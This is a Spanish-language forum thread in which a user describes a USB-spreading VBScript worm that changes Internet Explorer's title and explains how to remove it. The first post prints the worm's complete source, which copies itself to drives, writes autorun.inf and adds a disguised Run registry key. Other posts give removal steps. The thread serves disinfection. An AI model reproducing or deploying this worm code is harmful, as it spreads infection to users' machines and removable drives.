Resultados 1 al 4 de 4

Tema: Bantai usa e izrael al mukhid studio

  1. #1 Bantai usa e izrael al mukhid studio 
    Medio
    Fecha de ingreso
    Sep 2008
    Mensajes
    53
    Descargas
    0
    Uploads
    0
    A cuantos os ha salido eso... "BANTAI USA E IZRAEL AL MUKHID STUDIO"... en vuestra barra de título de internet explorer?

    Yo estaba infectado, el comportamiento de mi sistema era normal aunque con algunas diferencias, y un día me rallé y me puse a buscar en la web y en mi sistema de qué se trataba.

    Si buscais en google, hay algunas webs que hablan de esto, pero como lo he eliminado voy a hacer un pequeño resumen de qué es.

    Los síntomas de estar infectado, además de que te aparece ese título en el internet explorer, es que cuando haces doble click en muchos accesos que utilizan VBS del sistema para ejecutarse (ejemplo, Mi PC y los accesos a los discos duros), no hace nada. Es decir, que vas a explorar tu disco duro y no te responde al doble click, sino que has de darle con el boton derecho y hacer click en "Abrir" o "Explorar". Además de eso, internet explorer va lento de forma general, incluso explorar tu disco duro se hace pesado.

    El virus en realidad no es un virus. Se trata de un script que se cuela como un virus a través de ejecución de vbs que el sistema utiliza cuando haces descargas directas o, sobre todo, utilizas discos duros usb y los exploras a través del menú emergente que te sale cuando lo detecta.

    He aquí su código, para los más expertos de VBS y puedan explicar con exactitud lo que hace, pues yo entiendo por encima el funcionamiento.

    Código:
    on error resume next
    Rem 121206, do u still remember dis day us_3?
    Dim src, winpath, flashdrive, fs, mf, atr, tf, rg, nt, check, sd:atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe WIN31.dll.vbs":Set fs = CreateObject("Scripting.FileSystemObject"): Set mf = fs.getfile(Wscript.ScriptFullname): Dim text, size: size = mf.size: check = mf.drive.drivetype: Set text = mf.openastextstream(1, -2)
    Do While Not text.atendofstream: src=src&text.readline: src = src & vbCrLf: Loop
    Do: Set winpath = fs.getspecialfolder(0): Set tf = fs.getfile(winpath & "\WIN31.dll.vbs"): tf.Attributes = 32: Set tf = fs.createtextfile(winpath & "\WIN31.dll.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(winpath & "\WIN31.dll.vbs"): tf.Attributes = 39
    For Each flashdrive In fs.drives
    If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path <> "A:" Then: Set tf = fs.getfile(flashdrive.Path & "\WIN31.dll.vbs"): tf.Attributes = 32: Set tf = fs.createtextfile(flashdrive.Path & "\WIN31.dll.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(flashdrive.Path & "\WIN31.dll.vbs"): tf.Attributes = 39: Set tf = fs.getfile(flashdrive.Path & "\autorun.inf"): tf.Attributes = 32: Set tf = fs.createtextfile(flashdrive.Path & "\autorun.inf", 2, True): tf.write atr: tf.Close: Set tf = fs.getfile(flashdrive.Path & "\autorun.inf"): tf.Attributes = 39: End If
    Next
    Set rg = CreateObject("WScript.Shell"): rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\mcafee",winpath & "\WIN31.dll.vbs": rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "BANTAI USA & EZRAEL [AL - MUKHLIS STUDIO]": rg.regwrite "HKCR\vbsfile\DefaultIcon", "shell32.dll,2"
    If check <> 1 Then Wscript.sleep 200000
    Loop While check <> 1: Set sd = CreateObject("Wscript.shell"): sd.run winpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
    La forma de quitarlo, es aplicar el mostrar los archivos ocultos y sus extensiones mediante el menú de herramientas, y elimitar el archivo:

    C:\autorun.inf
    c:\win31.dll.vbs
    C:\windows\win31.dll.vbs

    y si se da el caso de que exista también, por lo que he visto en la web por otras versiones del script:

    c:\key.exe
    c:\windows\key.exe

    Esto hay que hacerlo en TODOS los discos duros, y si no sabes si está infectado uno de los externos no explorar nunca con doble click, sino con el menú emergente y "Abrir" o "Explorar" y repetir este proceso.

    Además de eso, para los discos locales internos, hay que quitar los registros de windows que corresponden al script y al titulito, para que comprobemos que todo funciona ok.

    HKLM\Software\Microsoft\Internet Explorer\ -> una del titulo que nos interesa, BANTAI USA E IZRAEL AL MUKHID STUDIO
    HKLM\Sofware\Microsoft\Windows\Current Version\Run\ Mcafee - Win31.dll.vbs

    Si está el de Key.exe, tambien.

    Después, reiniciar, y viola.

    Os recomiendo que os deshabiliteis la funcion de ejecución de scripts automática, que windows tiene y utiliza sin permiso. En ocasiones facilita la vida para que hagamos doble click, y por otro lado genera vulnerabilidades como esta. Menos mal que el codigo no es tan malicioso como podria serlo.

    Un saludo.
    Cita Iniciado por clarinetista
    Que yo se sacar claves WIFI y pago mi conexión todos los meses
    " Amén
    Citar  
     

  2. #2  
    Co-Admin HackHispano.com Avatar de clarinetista
    Fecha de ingreso
    Jan 2004
    Ubicación
    HackHispano/SM
    Mensajes
    7.720
    Descargas
    30
    Uploads
    8
    Gracias por el aporte , ethersal
    Citar  
     

  3. #3  
    Medio
    Fecha de ingreso
    Sep 2008
    Mensajes
    53
    Descargas
    0
    Uploads
    0
    Y en mi curro están todos así. Lo que digo, un dia me rayé y me puse a investigar xD

    De nada clarinetista
    Cita Iniciado por clarinetista
    Que yo se sacar claves WIFI y pago mi conexión todos los meses
    " Amén
    Citar  
     

  4. #4  
    Medio
    Fecha de ingreso
    Sep 2008
    Mensajes
    53
    Descargas
    0
    Uploads
    0
    Tengo que hacer un apunte.

    Para encontrar los archivos no siempre bastará con permitir ver los archivos ocultos.

    Es recomendable pues, ir a una ventana del cmd y escribir en la unidad donde vayas a desinfectar:

    C:\>attrib -s -h win31.dll.vbs
    C:\>attrib -s -h autorun.inf

    AUnque como el script tiene distintas versiones, sería recomendable poner

    C:\>attrib -s -h *.*

    Y eliminar aquellos archivos que molesten. Además de eso, habeis de ser rápidos pues ambos archivos vuelven a coger su modo hide en cuestión de segundos.
    Cita Iniciado por clarinetista
    Que yo se sacar claves WIFI y pago mi conexión todos los meses
    " Amén
    Citar  
     

Temas similares

  1. Fl Studio 7.0
    Por Pacino en el foro GENERAL
    Respuestas: 3
    Último mensaje: 22-10-2007, 17:05
  2. Hollywood FX for Studio 5.5 --***
    Por ale592 en el foro MULTIMEDIA
    Respuestas: 3
    Último mensaje: 02-08-2006, 01:30
  3. Macromedia Studio MX
    Por Lagarto #2 en el foro MULTIMEDIA
    Respuestas: 3
    Último mensaje: 02-09-2003, 16:40
  4. visual studio 6.0
    Por cracon en el foro PROGRAMACION DESKTOP
    Respuestas: 14
    Último mensaje: 25-06-2003, 01:56
  5. 3 D studio max 4 (autorizacion)
    Por Silicon en el foro APLICACIONES
    Respuestas: 2
    Último mensaje: 25-05-2002, 23:43

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •